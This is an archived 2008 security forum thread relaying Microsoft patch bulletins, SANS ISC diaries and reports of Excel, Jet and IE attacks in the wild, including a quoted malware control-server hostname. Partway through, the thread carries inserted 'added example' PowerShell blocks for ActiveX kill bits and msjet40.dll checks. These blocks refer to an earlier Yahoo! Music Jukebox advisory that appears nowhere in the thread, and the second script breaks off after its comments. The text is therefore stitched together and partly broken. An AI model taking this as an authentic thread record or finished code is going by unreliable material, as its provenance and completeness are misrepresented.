AplusWebMaster
2008-02-07, 20:41
FYI...

- http://www.microsoft.com/technet/security/Bulletin/MS08-feb.mspx
Published: February 7, 2008 - "This is an advance notification of -twelve- security bulletins that Microsoft is intending to release on February 12, 2008...

> Critical (7)

Bulletin Identifier: Microsoft Security Bulletin 5
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Windows...

Bulletin Identifier: Microsoft Security Bulletin 6
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Windows, Office, Visual Basic...

Bulletin Identifier: Microsoft Security Bulletin 7
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Windows, VBScript, JScript...

Bulletin Identifier: Microsoft Security Bulletin 8
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Windows, Internet Explorer...

Bulletin Identifier: Microsoft Security Bulletin 10
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Office...

Bulletin Identifier: Microsoft Security Bulletin 11
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Office...

Bulletin Identifier: Microsoft Security Bulletin 12
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Office...


> Important (5)

Bulletin Identifier: Microsoft Security Bulletin 1
Maximum Severity Rating: Important
Impact of Vulnerability: Denial of Service
Affected Software: Windows, Active Directory, ADAM...

Bulletin Identifier: Microsoft Security Bulletin 2
Maximum Severity Rating: Important
Impact of Vulnerability: Denial of Service...
Affected Software: Windows...

Bulletin Identifier: Microsoft Security Bulletin 3
Maximum Severity Rating: Important
Impact of Vulnerability: Elevation of Privilege...
Affected Software: Windows, IIS...

Bulletin Identifier: Microsoft Security Bulletin 4
Maximum Severity Rating: Important
Impact of Vulnerability: Remote Code Execution...
Affected Software: Windows, IIS...

Bulletin Identifier: Microsoft Security Bulletin 9
Maximum Severity Rating: Important
Impact of Vulnerability: Remote Code Execution...
Affected Software: Office, Works, Works Suite...

------------------------------

Microsoft Windows Malicious Software Removal Tool
Microsoft will release an updated version of the Microsoft Windows Malicious Software Removal Tool on Windows Update, Microsoft Update, Windows Server Update Services, and the Download Center.

Non-Security, High-Priority Updates on MU, WU, and WSUS
For this month:
• Microsoft is planning to release -seven- non-security, high-priority updates on Microsoft Update (MU) and Windows Server Update Services (WSUS).
• Microsoft is planning to release -two- non-security, high-priority updates for Windows on Windows Update (WU) and WSUS.

Note that this information pertains only to non-security, high-priority updates on Microsoft Update, Windows Update, and Windows Server Update Services released on the same day as the security bulletin summary. Information is not provided about non-security updates released on other days..."

AplusWebMaster
2008-02-12, 21:07
FYI...

- http://www.microsoft.com/technet/security/bulletin/ms08-feb.mspx
February 12, 2008

"This bulletin summary lists security bulletins released for February 2008...

> Critical (6)

Microsoft Security Bulletin MS08-007
Vulnerability in WebDAV Mini-Redirector Could Allow Remote Code Execution (946026)
- http://www.microsoft.com/technet/security/bulletin/ms08-007.mspx
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Windows...

Microsoft Security Bulletin MS08-008
Vulnerability in OLE Automation Could Allow Remote Code Execution (947890)
- http://www.microsoft.com/technet/security/bulletin/ms08-008.mspx
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Windows, Office, Visual Basic...

Microsoft Security Bulletin MS08-009
Vulnerability in Microsoft Word Could Allow Remote Code Execution (947077)
- http://www.microsoft.com/technet/security/bulletin/ms08-009.mspx
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Office...

Microsoft Security Bulletin MS08-010
Cumulative Security Update for Internet Explorer (944533)
- http://www.microsoft.com/technet/security/bulletin/ms08-010.mspx
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Windows, Internet Explorer...

Microsoft Security Bulletin MS08-012
Vulnerabilities in Microsoft Office Publisher Could Allow Remote Code Execution (947085)
- http://www.microsoft.com/technet/security/bulletin/ms08-012.mspx
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Office...

Microsoft Security Bulletin MS08-013
Vulnerability in Microsoft Office Could Allow Remote Code Execution (947108)
- http://www.microsoft.com/technet/security/bulletin/ms08-013.mspx
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Office...


> Important (5)

Microsoft Security Bulletin MS08-003
Vulnerability in Active Directory Could Allow Denial of Service (946538)
- http://www.microsoft.com/technet/security/bulletin/ms08-003.mspx
Maximum Severity Rating: Important
Impact of Vulnerability: Denial of Service...
Affected Software: Windows, Active Directory, ADAM...

Microsoft Security Bulletin MS08-004
Vulnerability in Windows TCP/IP Could Allow Denial of Service (946456)
- http://www.microsoft.com/technet/security/bulletin/ms08-004.mspx
Maximum Severity Rating: Important
Impact of Vulnerability: Denial of Service...
Affected Software: Windows...

Microsoft Security Bulletin MS08-005
Vulnerability in Internet Information Services Could Allow Elevation of Privilege (942831)
- http://www.microsoft.com/technet/security/bulletin/ms08-005.mspx
Maximum Severity Rating: Important
Impact of Vulnerability: Elevation of Privilege...
Affected Software: Windows, IIS...

Microsoft Security Bulletin MS08-006
Vulnerability in Internet Information Services Could Allow Remote Code Execution (942830)
- http://www.microsoft.com/technet/security/bulletin/ms08-006.mspx
Maximum Severity Rating: Important
Impact of Vulnerability: Remote Code Execution...
Affected Software: Windows, IIS...

Microsoft Security Bulletin MS08-011
Vulnerabilities in Microsoft Works File Converter Could Allow Remote Code Execution (947081)
- http://www.microsoft.com/technet/security/bulletin/ms08-011.mspx
Maximum Severity Rating: Important
Impact of Vulnerability: Remote Code Execution...
Affected Software: Office, Works, Works Suite..."
----------------------

ISC Analysis
- http://isc.sans.org/diary.html?storyid=3973
Last Updated: 2008-02-12 19:23:49 UTC

.

AplusWebMaster
2008-02-14, 02:08
FYI...

- http://isc.sans.org/diary.html?storyid=3973
Last Updated: 2008-02-13 18:25:13 UTC ...(Version: 3)
"...
MS08-007... WebDAV - Exploit instructions public... Critical
Vulnerability in WebDAV Mini-Redirector allows Remote Code Execution

MS08-010... IE - Exploit publicly available... PATCH NOW
Cumulative Security Update for Internet Explorer

MS08-011... Works - Exploit publicly available... Critical
Multiple vulnerabilities in Microsoft Works File Converter allow Remote Code Execution ..."

> http://forums.spybot.info/showpost.php?p=163889&postcount=33

:fear:

AplusWebMaster
2008-02-15, 06:18
FYI...

- http://isc.sans.org/diary.html?storyid=3973
Last Updated: 2008-02-15 01:51:27 UTC ...(Version: 4)

MS08-006 - IIS - Detailed discussion and DoS exploit made public - Important
Vulnerability in IIS Handling of HTML-encoded ASP Web Pages allows Remote Code Execution

> http://forums.spybot.info/showpost.php?p=163889&postcount=33


:fear:

AplusWebMaster
2008-02-20, 00:53
FYI...

- http://isc.sans.org/diary.html?storyid=3998
Last Updated: 2008-02-19 21:13:32 UTC - "We received information in regards to Microsoft Vista getting into a reboot loop after running the Windows Update..."

(Details at the URL above.)


:fear:

AplusWebMaster
2008-02-20, 17:46
FYI...

Vista SP1 pre-req "temporarily suspended"
- http://preview.tinyurl.com/yqvvoa
February 19, 2008 (Windows Vista blog) - "We've heard a few reports about problems customers may be experiencing as a result of KB937287*, the servicing stack update I blogged about last week, and I wanted to provide a quick update for you. Immediately after receiving reports of this error, we made the decision to temporarily suspend automatic distribution of the update to avoid further customer impact while we investigate possible causes... Customers who may be experiencing this issue can use system restore to correct it or contact 1-866-PC-Safety for help troubleshooting..."
* http://support.microsoft.com/kb/937287

:lip:

AplusWebMaster
2008-02-21, 18:29
FYI...

Dual-booting XP deletes Vista restore points
- http://windowssecrets.com/comp/080221#known0
2008-02-21 - "... booting to XP on a dual-boot system has the negative side-effect of deleting any Vista restore points, in addition to all but its latest backup file, and a Registry workaround* is required to prevent this..."
* http://support.microsoft.com/kb/926185

:sad::fear::buried:

AplusWebMaster
2008-02-22, 15:15
FYI...

Vista SP1 Blocks AV Programs
- http://www.informationweek.com/shared/printableArticle.jhtml?articleID=206801120
Feb. 21, 2008 - "A major update to Microsoft's Windows Vista operating system could leave computers vulnerable to hackers and malware as the service pack prevents several widely used antivirus programs from operating, the company said. The list of security products that Windows Vista Service Pack 1 blocks includes Zone Alarm Security Suite 7.1, Trend Micro Internet Security 2008, and BitDefender 10. It also blocks the 2008 version of the Jiangmin antivirus product. Microsoft said the blocks occur because the antivirus programs are not compatible with Vista SP1. "For reliability reasons, Microsoft blocks these programs from starting after you install Windows Vista SP1," the company said in a statement posted Wednesday on its support Web site*..."
* http://support.microsoft.com/kb/935796
Last Review: February 22, 2008
Revision: 3.0

:lip:

AplusWebMaster
2008-02-23, 13:17
FYI...

- http://preview.tinyurl.com/yqvvoa
February 19, 2008 (Windows Vista blog) - "We've heard a few reports about problems customers may be experiencing as a result of KB937287*..."
* http://support.microsoft.com/kb/937287

The update is not installed successfully, you receive a message, and the computer restarts when you try to install an update in Windows Vista
> http://support.microsoft.com/kb/949358/en-us
Last Review: February 22, 2008
Revision: 1.0
"...To avoid this problem, install update 937287 separately from all other updates. Install the update that applies to your version of Windows Vista to enable future updates to be installed successfully..."

:lip:

AplusWebMaster
2008-02-23, 20:50
- http://blog.washingtonpost.com/securityfix/2008/02/hackers_exploiting_facebook_my.html
February 23, 2008 - "If you use Internet Explorer (versions 6 or 7) to browse the Web, listen up: Criminals are starting to exploit security holes in several widely installed IE plug-ins to plant invasive software when users are coerced or tricked into visiting one of several Web sites. In an alert posted Friday evening, security software vendor Symantec said it is seeing malicious Web sites popping up trying to exploit vulnerabilities in a set of ActiveX controls produced by Aurigma, a technology company whose image transfer browser plug-in is licensed and distributed by a number of major Web sites to help IE users upload pictures. Currently, Facebook.com and MySpace.com are among the biggest distributors of this ActiveX plug-in, but they are hardly the only ones... The malicious Web sites identified by Symantec actually redirect visitors to a fake MySpace.com login page in an attempt to steal MySpace credentials, all while trying the various plug-in exploits quietly in the background... The sites all download a series of executable programs, including some that Symantec said appear to be placeholders for whatever nasties the bad guys want to stuff in there later. The company said it is still in the process of analyzing the programs to see what they do, but it's doubtful they will turn out to be harmless... If you haven't checked out the free, easy-to-use fixit tool* released by incident handlers at the SANS Internet Storm Center, please do so now. The simple, graphical program sets a marker in the Windows registry so that if the vulnerable ActiveX components are installed, then the operating system will not let anyone or anything make use of or activate those components... If you ever want to -undo- any part of what (the tool does), run the tool again and uncheck the relevant boxes and hit "set."
* http://isc.sans.org/diary.html?storyid=3931
Last Updated: 2008-02-05 19:48:41 UTC ...(Version: 3)
(Direct link for tool - http://handlers.sans.org/tliston/KillBitGui-Feb08.exe )

:fear:
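
The "marker in the Windows registry" that the SANS tool sets, and the kill-bit that the Secunia advisory for the Yahoo! Music Jukebox controls recommends earlier in this thread, is the same thing: bit 0x400 of the "Compatibility Flags" DWORD under IE's ActiveX Compatibility key for the control's CLSID. The PowerShell below is an added example (not code from the thread, from Microsoft, or from the SANS KillBitGui tool) that audits and sets that bit for a list of CLSIDs; the CLSIDs in it are placeholders, since the thread does not give the identifiers of the Yahoo! or Aurigma controls.

```powershell
# Added example, not code from the forum thread, from Microsoft or from the SANS
# KillBitGui tool: audit and set the ActiveX "kill bit" for a list of CLSIDs.
# The kill bit is bit 0x400 of the DWORD "Compatibility Flags" under
#   HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{CLSID}
# (plus the Wow6432Node view used by 32-bit IE on 64-bit Windows). IE refuses to
# instantiate a control whose CLSID carries this bit, even if its DLL stays installed.
# Assumptions: elevated Windows PowerShell; the CLSIDs in $Targets are PLACEHOLDERS
# constructed for this example, not the Yahoo! or Aurigma control identifiers.

$KillBit = 0x400
$BasePaths = @(
    'HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility',
    'HKLM:\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility'
)

# Placeholder CLSIDs, constructed for this example only.
$Targets = @(
    '{11111111-1111-1111-1111-111111111111}',
    '{22222222-2222-2222-2222-222222222222}'
)

function Get-CompatFlags {
    # Returns the current "Compatibility Flags" DWORD for a key, or 0 if key/value is absent.
    param([string]$Key)
    if (-not (Test-Path -LiteralPath $Key)) { return 0 }
    $item = Get-ItemProperty -LiteralPath $Key -Name 'Compatibility Flags' -ErrorAction SilentlyContinue
    if ($null -eq $item) { return 0 }
    return [int]$item.'Compatibility Flags'
}

function Get-KillBitState {
    # One result row per CLSID per registry view: is the kill bit already present?
    param([string[]]$Clsid = $Targets)
    foreach ($c in $Clsid) {
        foreach ($base in $BasePaths) {
            if (-not (Test-Path -LiteralPath $base)) { continue }   # no Wow6432Node on 32-bit Windows
            $flags = Get-CompatFlags (Join-Path $base $c)
            New-Object PSObject -Property @{
                Clsid      = $c
                View       = $base
                Flags      = ('0x{0:X}' -f $flags)
                KillBitSet = (($flags -band $KillBit) -ne 0)
            }
        }
    }
}

function Set-KillBit {
    # Sets the kill bit while preserving any other compatibility flags already present.
    param([string[]]$Clsid = $Targets)
    foreach ($c in $Clsid) {
        foreach ($base in $BasePaths) {
            if (-not (Test-Path -LiteralPath $base)) { continue }
            $key = Join-Path $base $c
            if (-not (Test-Path -LiteralPath $key)) { New-Item -Path $key -Force | Out-Null }
            $new = (Get-CompatFlags $key) -bor $KillBit
            Set-ItemProperty -LiteralPath $key -Name 'Compatibility Flags' -Value $new -Type DWord
        }
    }
}

# Audit first; uncomment the second line to apply and re-audit.
Get-KillBitState | Format-Table Clsid, KillBitSet, Flags, View -AutoSize
# Set-KillBit; Get-KillBitState | Format-Table Clsid, KillBitSet, Flags, View -AutoSize
```

Undoing the change means clearing the 0x400 bit (or deleting the CLSID key if you created it), which is what re-running the SANS tool with the box unchecked does.
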

AplusWebMaster
2008-03-04, 13:58
FYI...

Vista SP1 Survival Guide
- http://www.informationweek.com/shared/printableArticle.jhtml?articleID=205917537
March 4, 2008


.

AplusWebMaster
2008-03-06, 20:41
FYI...

- http://www.microsoft.com/technet/security/Bulletin/MS08-mar.mspx
March 6, 2008 - "...This is an advance notification of -four- security bulletins that Microsoft is intending to release on March 11, 2008..."

Critical (4)

Microsoft Security Bulletin 1
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Office...

Microsoft Security Bulletin 2
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Office....

Microsoft Security Bulletin 3
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Office...

Microsoft Security Bulletin 4
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Office Web Components...


Non-Security, High-Priority Updates on MU, WU, and WSUS
For this month:
• Microsoft is planning to release -two- non-security, high-priority updates on Microsoft Update (MU) and Windows Server Update Services (WSUS).
• Microsoft is planning to release -three- non-security, high-priority updates for Windows on Windows Update (WU) and WSUS.

Note that this information pertains only to non-security, high-priority updates on Microsoft Update, Windows Update, and Windows Server Update Services released on the same day as the security bulletin summary. Information is not provided about non-security updates released on other days..."

AplusWebMaster
2008-03-06, 23:43
FYI...

- http://preview.tinyurl.com/ypjaam
March 6, 2008 (AvertLabs blog) - "Microsoft’s OneCare team issued an update on January 31, 2008 that resulted in SiteAdvisor users receiving a Microsoft warning message recommending that SiteAdvisor be removed due to interference with OneCare... as a general rule, Microsoft recommends running only one security application at a time because of potential performance and “PC stability” issues. We explained to Microsoft that SiteAdvisor functionality is totally unrelated to OneCare. They agreed... there is no need to disable SiteAdvisor or OneCare. The two products co-exist nicely (aside from the pop-up!). Because OneCare doesn’t allow white listing of applications, affected consumers have limited options until all installations of OneCare are patched."

:thud::spider::sick:

AplusWebMaster
2008-03-11, 13:55
FYI...

- http://isc.sans.org/diary.html?storyid=4117
Last Updated: 2008-03-10 23:52:52 UTC - "...We can confirm these attacks and have been tracking several exploits over the last few days. It should be noted that the incidents we are aware of have been limited to a very specific targeted attack and were not widespread. In total, we established approximately 21 reports of attacks using only 8 different files, from within the same two communities, so far... some of the signatures we know of that catch iterations of these attacks. Note that some are relatively generic and catch multiple other exploits as well... Trojan-Dropper.MSExcel.Agent ...We are aware that some of the samples connect back to update-microsoft.kmip.net (221.130.180.87) on port 80, to retrieve the IP address of the actual control server."

> http://www.us-cert.gov/current/#trojan_exploiting_microsoft_excel_vulnerability

- http://blog.trendmicro.com/olympic-fans-may-fall-for-unpatched-ms-excel-vuln/
March 9, 2008 - "XLS files specially designed to exploit a currently unpatched vulnerability in Microsoft Excel (identified as CVE-2008-0081) are reportedly being sent as email attachments in the wild. The attachments, which arrive either as OLYMPIC.XLS or SCHEDULE.XLS are capable of dropping and executing Windows binary executables. This Trojan also drops a non-malicious Excel file and opens it upon execution to trick the user that it is the attached Excel file... Both OLYMPIC.XLS and SCHEDULE.XLS are observed to use similar exploit templates and even allow malware writers to customize the exploit to perform other routines... malware authors are using this window of opportunity to infect a large number of computers. More information on this exploit can be found on this Microsoft Security Advisory*. Trend Micro advises users to be wary of opening unsolicited email messages, much more of files attached to them..."
(Screenshots available at the URL above.)

* http://www.microsoft.com/technet/security/advisory/947563.mspx
January 16, 2008

- http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-0081
Last revised: 1/17/2008

:fear::spider::fear:

AplusWebMaster
2008-03-11, 19:58
FYI...

- http://www.microsoft.com/technet/security/Bulletin/MS08-mar.mspx
March 11, 2008
"...The security bulletins for this month are as follows, in order of severity:

Critical (4)

Microsoft Security Bulletin MS08-014
Vulnerabilities in Microsoft Excel Could Allow Remote Code Execution (949029)
- http://www.microsoft.com/technet/security/bulletin/MS08-014.mspx
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Office...

Microsoft Security Bulletin MS08-015
Vulnerability in Microsoft Outlook Could Allow Remote Code Execution (949031)
- http://www.microsoft.com/technet/security/bulletin/MS08-015.mspx
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Office...

Microsoft Security Bulletin MS08-016
Vulnerabilities in Microsoft Office Could Allow Remote Code Execution (949030)
- http://www.microsoft.com/technet/security/bulletin/MS08-016.mspx
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Office...

Microsoft Security Bulletin MS08-017
Vulnerabilities in Microsoft Office Web Components Could Allow Remote Code Execution (933103)
- http://www.microsoft.com/technet/security/bulletin/MS08-017.mspx
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Office Web Components...


Other Information -
Microsoft Windows Malicious Software Removal Tool
Microsoft has released an updated version of the Microsoft Windows Malicious Software Removal Tool on Windows Update, Microsoft Update, Windows Server Update Services, and the Download Center.

Non-Security, High-Priority Updates on MU, WU, and WSUS
For this month:
• Microsoft has released -two- non-security, high-priority updates on Microsoft Update (MU) and Windows Server Update Services (WSUS).
• Microsoft has released -three- non-security, high-priority updates for Windows on Windows Update (WU) and WSUS.

Note that this information pertains only to non-security, high-priority updates on Microsoft Update, Windows Update, and Windows Server Update Services released on the same day as the security bulletin summary. Information is not provided about non-security updates released on other days..."
--------------------------------------------------------------

ISC Analysis
- http://isc.sans.org/diary.html?storyid=4124
Last Updated: 2008-03-11 18:33:40 UTC
--------------------------------------------------------------

Microsoft Security Advisory (947563)
Vulnerability in Microsoft Excel Could Allow Remote Code Execution
- http://www.microsoft.com/technet/security/advisory/947563.mspx
Published: January 15, 2008 | Updated: March 11, 2008 - "...We have issued MS08-014* to address this issue..."
* http://www.microsoft.com/technet/security/Bulletin/MS08-014.mspx

AplusWebMaster
2008-03-12, 13:22
FYI...

- http://isc.sans.org/diary.html?storyid=4126
Last Updated: 2008-03-11 20:57:53 UTC - "The many out there still using older versions of MSIE (such as Internet Explorer 5 or 6) might well be interested in two new vulnerabilities discovered and made public today on full disclosure. It looks somewhat like a Cross Site Request Forgery (CSRF) attack: A malicious URL you (somehow) hit. It can be unintentional on the user's part through e.g. an injected iframe on a forum. The URL tells the client to contact another server and does some bad things there that the user never intended, but had the authorization to do. The twist in this case is that the second hit doing damage can also be a FTP request, not just a HTTP request. Still normally you can only log in and download (GET) files using a URL, and if the FTP server is requiring authentication, the user or the URL should enter the login/password, tipping them off something strange is going on or the attacker already knowing the credential. That's true, till you see the duo of bugs in IE:
* Apparently IE5 and IE6 allow other commands too, such as deleting files by constructing a URL with %-encoded line-breaks.
* Similarly IE 5 and IE6 allow the URL to be constructed in such a manner as to try to re-authenticate with cached credentials.
IE7 is claimed not to suffer from this, so if you need a bit more incentive to (be allowed to) upgrade, this might just be it."
--------------------------------

- http://preview.tinyurl.com/2at5ub
March 12, 2008 (ComputerWorld) - "A flaw in the way Microsoft's Internet Explorer browser processes FTP commands could let attackers steal or erase data from a victim's FTP site. The bug, which affects users of IE 6 and the unsupported IE 5 browser, gives an attacker a way of hijacking the victim's FTP sessions... "The attack seems viable, but the stars have to be aligned just right for the attack to work," said Craig Schmugar, a researcher with McAfee's Avert Labs..."

('Maybe -not- so difficult...)
- http://www.finjan.com/Content.aspx?id=1367
("Malicious Page of the Month" Feb. 2008 synopsis) - "...deployment of ready-made Crimeware toolkits has gained momentum... When examining a server hosting the latest version of this Crimeware toolkit, we also found an almost unnoticeable standalone application, especially designed to abuse and trade stolen FTP account credentials of legitimate companies around the world. More than 8,700 FTP servers’ credentials of highly respected organizations and enterprises were thus stolen, including valid user names and passwords."
--------------------------------

- http://secunia.com/advisories/29346/
Release Date: 2008-03-12
Impact: Manipulation of data
Where: From remote
Solution Status: Unpatched
Software: MS IE 5.01, MS IE 6.x
...The vulnerability is confirmed in version 6.0.2900.2180 and also reported in version 5. Other versions may also be affected.
Solution: Upgrade to Internet Explorer 7. Do not browse untrusted websites...
--------------------------------

- http://www.securityfocus.com/bid/28208/discuss
"...This issue affects Internet Explorer 5 and 6; prior versions may also be affected..."
- http://www.securityfocus.com/bid/28208/solution
Solution:
Reports indicate that the vendor intends to release a patch that will address this issue...
- http://www.rapid7.com/advisories/R7-0032.jsp
"...Solution
The vendor plans to release a patch for this issue in an upcoming security bulletin. If possible, upgrade to Internet Explorer 7..."

:fear:

AplusWebMaster
2008-03-18, 14:25
FYI...

- http://www.us-cert.gov/current/#microsoft_updates_march_security_bulletin
updated March 17, 2008 - " Microsoft has made revisions to all of the March Security Bulletins. These revisions:
* Clarify why a non-vulnerable version of Office was offered during this update.
* Correct the registry key for verifying the update for ISA Server.
* Remove MS07-015 as a replaced bulletin for Microsoft Office XP Service Pack 3.
* Update vulnerability FAQs
* Update file information tables for Outlook 2000 and 2003.
Microsoft has also re-released MS08-014 to include additional information about issues relating to users of Excel 2003 Service Pack 2 or Service Pack 3..."

:fear:

AplusWebMaster
2008-03-19, 19:46
FYI...

Vista SP1
- http://isc.sans.org/diary.html?storyid=4160
Last Updated: 2008-03-19 17:04:57 UTC ...(Version: 3)
"The first service pack from Microsoft for Vista is out. Please let us know your experiences downloading and applying the 434.5 MB Windows Vista Service Pack 1 Five Language Standalone (KB936330):

MS downloads:
- http://preview.tinyurl.com/ywb4al
"...IF YOU ARE UPDATING JUST ONE COMPUTER: A smaller, more appropriate download is available on Windows Update..."

Update 1: If Vista SP1 will not install, or is not being offered as an option, you should read the following article. You may have to update drivers first or other issues...
Windows Vista Service Pack 1 is not available for installation from Windows Update and is not offered by Automatic Updates: http://support.microsoft.com/?kbid=948343

Update 2: Before you install the final release of Windows Vista SP1, you must uninstall any previous releases... http://support.microsoft.com/kb/936330

Windows Service Pack Blocker Tool
- http://technet.microsoft.com/en-us/windowsvista/bb927794.aspx

.

AplusWebMaster
2008-03-20, 01:39
FYI...

- http://blogs.technet.com/msrc/archive/2008/03/19/march-2008-ms08-014-re-release.aspx
March 19, 2008 - "...we've just re-released MS08-014 for Microsoft Office Excel 2003 Service Pack 2 and Service Pack 3 only... The original version released on March 11, 2008 did fully protect against the security issues discussed in the bulletin. However, after release we discovered that the security update caused a calculation error in Microsoft Excel 2003 when a Real Time Data source was used in a user-created Visual Basic for Applications solution (in other words a custom-built VBA function). For additional details, please refer to KB950340*. If you're -not- running Microsoft Excel 2003, this re-release doesn't apply to you and you don't need to take any action. If you are running Microsoft Excel 2003 Service Pack 2 or Service Pack 3, you should use the guidance provided in Knowledge Base article KB950340* to deploy the new update."
* http://support.microsoft.com/kb/950340

:lip:

AplusWebMaster
2008-03-21, 13:18
FYI...

Vista SP1 Chokes On Widely Used Intel Chipset Drivers
- http://www.informationweek.com/shared/printableArticle.jhtml?articleID=206904946
March 20, 2008 - "PCs from Hewlett-Packard, Gateway, Lenovo, and other major computer makers that contain a widely used Intel chipset can't be upgraded to Windows Vista Service Pack 1 if they're running certain drivers. Microsoft has said that Vista SP1 won't work with "a small number of device drivers." The list, however, includes drivers for an Intel chipset that's found in thousands of PCs and laptops. The affected chipset is Intel's 945G Express series, which is used in computers from virtually all major system vendors. It's also found on standalone motherboards sold by Asus. The 945G Express chipset driver versions between numbers 7.14.10.1322 and 7.14.10.1403 won't work with Vista SP1, according to Microsoft. Chipsets provide a connection point for all key subsystems within a PC. The 945G Express chipset includes Intel's GMA 950 graphics core, which also won't work with Vista SP1 if those drivers are used. Microsoft is urging Vista users to update all of their hardware to the latest drivers before even attempting to install SP1... The service pack also won't work with computers that use certain, widely-deployed audio drivers from Realtek and certain drivers for security devices manufactured by Symantec. Microsoft has published a full list of drivers that are incompatible with the service pack*. Meanwhile, Microsoft is continuing to receive reports from computer users who say Vista SP1 is wreaking havoc on their systems..."
* http://support.microsoft.com/?kbid=948343#method5
Last Review: March 20, 2008
Revision: 3.0

('Shades of the XPSP2 installs... 'Like Yogi said, "It's deja vu all over again"...)

:fear:

AplusWebMaster
2008-03-22, 12:47
FYI...

Microsoft Security Advisory (950627)
Vulnerability in Microsoft Jet Database Engine (Jet) Could Allow Remote Code Execution
- http://www.microsoft.com/technet/security/advisory/950627.mspx
March 21, 2008 - "Microsoft is investigating new public reports of very limited, targeted attacks using a vulnerability in the Microsoft Jet Database Engine that can be exploited through Microsoft Word.
Customers running Windows Server 2003 Service Pack 2, Windows Vista, and Windows Vista Service Pack 1 are not vulnerable to the buffer overrun being attacked, as they include a version of the Microsoft Jet Database Engine that is not vulnerable to this issue.
Customers using Microsoft Word 2000 Service Pack 3, Microsoft Word 2002 Service Pack 3, Microsoft Word 2003 Service Pack 2, Microsoft Word 2003 Service Pack 3, Microsoft Word 2007, and Microsoft Word 2007 Service Pack 1 on Microsoft Windows 2000, Windows XP, or Windows Server 2003 Service Pack 1 are vulnerable to these attacks.
Microsoft is investigating the public reports and customer impact. We are also investigating whether the vulnerability can be exploited through additional applications. Upon completion of this investigation, Microsoft will take the appropriate action to help protect our customers..."

- http://secunia.com/advisories/14896/
Last Update: 2008-03-24
Critical: Highly critical
Impact: System access
Where: From remote
Solution Status: Unpatched...
...affects versions of msjet40.dll prior to 4.0.9505.0...

:fear:

AplusWebMaster
2008-03-23, 00:19
FYI...

- http://www.symantec.com/avcenter/threatcon/learnabout.html
(03.22.2008) - "...On March 21, 2008 a public exploit was released for the Microsoft Excel Header Parsing Remote Code Execution Vulnerability (BID 27305). This vulnerability was originally published on January 15, 2008 as an unidentified issue due to reports of targeted exploitation occurring in the wild. It was later patched as part of MS08-014 on March 11, 2008, which addressed a number of different Excel issues.
Microsoft Excel Header Parsing Remote Code Execution Vulnerability
( http://www.securityfocus.com/bid/27305 )
MS08-014 ( http://www.microsoft.com/technet/security/Bulletin/MS08-014.mspx ) This is the first of the issues addressed by MS08-014 to have a public exploit available and therefore will likely see public exploitation in the future. The vulnerability specifically involves an uninitialized stack variable issue which was explained by Microsoft in a recent blog posting:
MS08-014: The Case of the Uninitialized Stack Variable Vulnerability
( http://preview.tinyurl.com/2lw6c6 ) [blogs.technet.com/swi]
At the time of writing we are not aware of any public exploitation incidents involving this exploit, however we are anticipating attacks to occur in the near future. Users are advised to apply the updates available in the MS08-014 bulletin immediately. Those unable to do so are advised to review the workarounds listed in the bulletin and avoid opening Excel documents where possible."

:fear:

AplusWebMaster
2008-03-25, 13:30
RE: http://www.microsoft.com/technet/security/advisory/950627.mspx

- http://isc.sans.org/diary.html?storyid=4192
Last Updated: 2008-03-25 00:41:39 UTC - "...A few minutes ago Microsoft has posted more details about this issue on the MSRC blog*. Summarizing:
- The Jet Database Engine vulnerability is well-known since March 2005. The main issue now is that it can be exploited through a new attack vector, Microsoft Word (specifically two DOC files), avoiding the mitigations enforced by Outlook and Exchange over this unsafe file type (MDB).
- Microsoft is currently working on the fixes, evaluating if an update may prevent Word from opening MDB files, and checking how to apply the fixed msjet40.dll currently available for Windows Server 2003 SP2, Windows Vista, and beta versions of Windows XP SP3 in other OS versions.
- In the meantime, apart from the general recommendation of not opening untrusted MS Word files, you can follow the two workarounds detailed on the initial advisory:
o Computer-based workaround: Restrict the Microsoft Jet Database Engine from running through the "cacls" command, used to modify the access control lists (ACLs) of files. Applications requiring the Jet Database Engine will not function.
o Infrastructure-based workaround: Block specific files at your mail gateway based on string signatures (if it provides file inspection capabilities). The associated strings plus implementation details for specific mail gateways are detailed on the advisory..."
* http://preview.tinyurl.com/2lvatz
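An added check for the Jet advisory above (this is not the advisory's or the ISC diary's own code). It reads the installed msjet40.dll version and compares it with the 4.0.9505.0 threshold quoted from the Secunia advisory earlier in the thread, and reports whether the advisory's computer-based workaround (a Deny ACE for Everyone added with cacls) is already in place. The path under %windir%\system32 is assumed; the two workaround helpers need an elevated prompt.

```powershell
# Added example, not from the advisory or the ISC diary.
# Assumed path of the 32-bit Jet engine; the fixed-version threshold is the one
# Secunia quotes (msjet40.dll prior to 4.0.9505.0 is affected).
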